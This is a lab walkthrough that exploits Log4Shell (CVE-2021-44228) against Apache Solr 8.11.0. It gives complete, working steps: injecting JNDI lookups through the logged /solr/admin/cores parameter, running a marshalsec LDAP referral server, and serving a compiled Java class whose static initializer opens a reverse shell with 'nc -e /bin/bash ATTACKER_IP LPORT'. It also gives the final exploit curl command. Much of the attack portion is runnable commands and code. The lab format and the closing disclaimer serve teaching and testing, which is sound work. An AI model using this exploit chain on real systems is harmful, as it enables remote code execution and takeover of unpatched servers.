Intro
This lab covers exploitation of the Log4j lookup vulnerability commonly known as Log4Shell.
Apache Solr 8.11.0 is running on the target machine; this release ships a vulnerable Log4j 2 package (CVE-2021-44228). The application itself runs on Java 1.8.0_181. The JDK version matters: releases before 8u191 still let a JNDI lookup load classes from a remote LDAP codebase by default (com.sun.jndi.ldap.object.trustURLCodebase is true), so the remote-class-loading technique used below works without any further tricks.
Enum
We can see clear indicators that Log4j is used for logging when we browse the Solr Admin Dashboard:

To find an injection point, we can review Solr's own log files. solr.log contains a large number of INFO entries recording repeated requests to one specific endpoint, /solr/admin/cores.

Each entry records the request's query string in a “params” field, so any value we place in a URL parameter ends up inside a logged message: that is our injection point. Inspecting the request through a proxy shows exactly which parameters are sent and therefore logged.

PoC
Log4j 2 does not write messages verbatim: it parses ${...} lookups inside them and replaces each with the looked-up value, a feature intended for enriching log data (environment variables, system properties and so on). One of those lookups, jndi, makes the JVM perform a JNDI lookup against a URL taken from the message itself, and on older JDKs that lookup can fetch and execute a remote class. This is the gist of CVE-2021-44228: attacker-controlled text reaches a log message, the jndi lookup runs, and code executes.
To exploit this issue, we need a malicious LDAP server that answers the target's JNDI lookup with a reference to a class hosted on an HTTP server we control.
Marshalsec (https://github.com/mbechler/marshalsec) ships such an LDAP referral server and is used for this part.
We need an IP address reachable from the target and two ports for the attack infrastructure: one for the LDAP server (LDAP_PORT, 1389 by default for marshalsec) and one for the HTTP server that will host the malicious class; a third port (LPORT) will catch the reverse shell at the end.
Before building anything, let's confirm whether the target is vulnerable. Start a netcat listener on the port the LDAP URL will point at (nc -lvnp LDAP_PORT), then send a lookup through the logged parameter. The braces are backslash-escaped because curl otherwise treats {...} as a URL glob pattern; curl strips the backslashes, so the target receives a plain ${jndi:...} string (passing -g to curl instead of escaping works as well):
curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT\}'
Output:

From the output, we can see that the netcat listener caught an inbound connection from the vulnerable machine, so the lookup fired. Only the TCP connection matters for this check: netcat does not speak LDAP, so the lookup itself fails on the target and nothing else happens yet.
Now build the marshalsec utility. Clone the repository linked above and, from its directory, run the following (a JDK and Maven are required):
mvn clean package -DskipTests
With marshalsec built, we can start an LDAP referral server that redirects JNDI lookups to our secondary HTTP server. The argument is the codebase URL followed by # and the class name to load; the server listens on port 1389 unless a different port is given as a second argument:
sudo java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ATTACKER_IP:8000/#Log4jshell
Now it is time to create the malicious class. The reverse shell lives in a static initializer, which the JVM runs as soon as it loads the class, so no instance or method call is needed on the target side.
“Log4jshell.java”:

public class Log4jshell {
    // Static initializer: executed when the target's JNDI lookup loads this class.
    static {
        try {
            // Reverse shell back to the attacker. ATTACKER_IP and LPORT are placeholders.
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash ATTACKER_IP LPORT");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Note that this relies on the target's netcat supporting -e (the OpenBSD build does not); if that is not the case, substitute another reverse-shell one-liner, for example one based on bash -i and /dev/tcp.
Compile the malicious payload. The class file must be loadable by the target's JVM, which is Java 8 here: compile with a JDK 8, or pass --release 8 to javac on a newer JDK, otherwise the target rejects the class with UnsupportedClassVersionError and the exploit fails silently.
javac Log4jshell.java
Output:

With Python, we can run an HTTP server that hosts the compiled class. Run it from the directory containing Log4jshell.class, on the port used in the codebase URL given to marshalsec:
python3 -m http.server 8000
Finally, start a listener for the reverse shell (nc -lvnp LPORT) and send the lookup again, this time pointing at the marshalsec LDAP server and naming the class. The target resolves the lookup, follows the referral to our HTTP server, loads Log4jshell.class and runs its static initializer, which spawns the reverse shell and lets us execute commands:
curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT/Log4jshell\}'
Output:


Disclaimer
All information and code is provided solely for educational purposes and for testing your own systems for these vulnerabilities.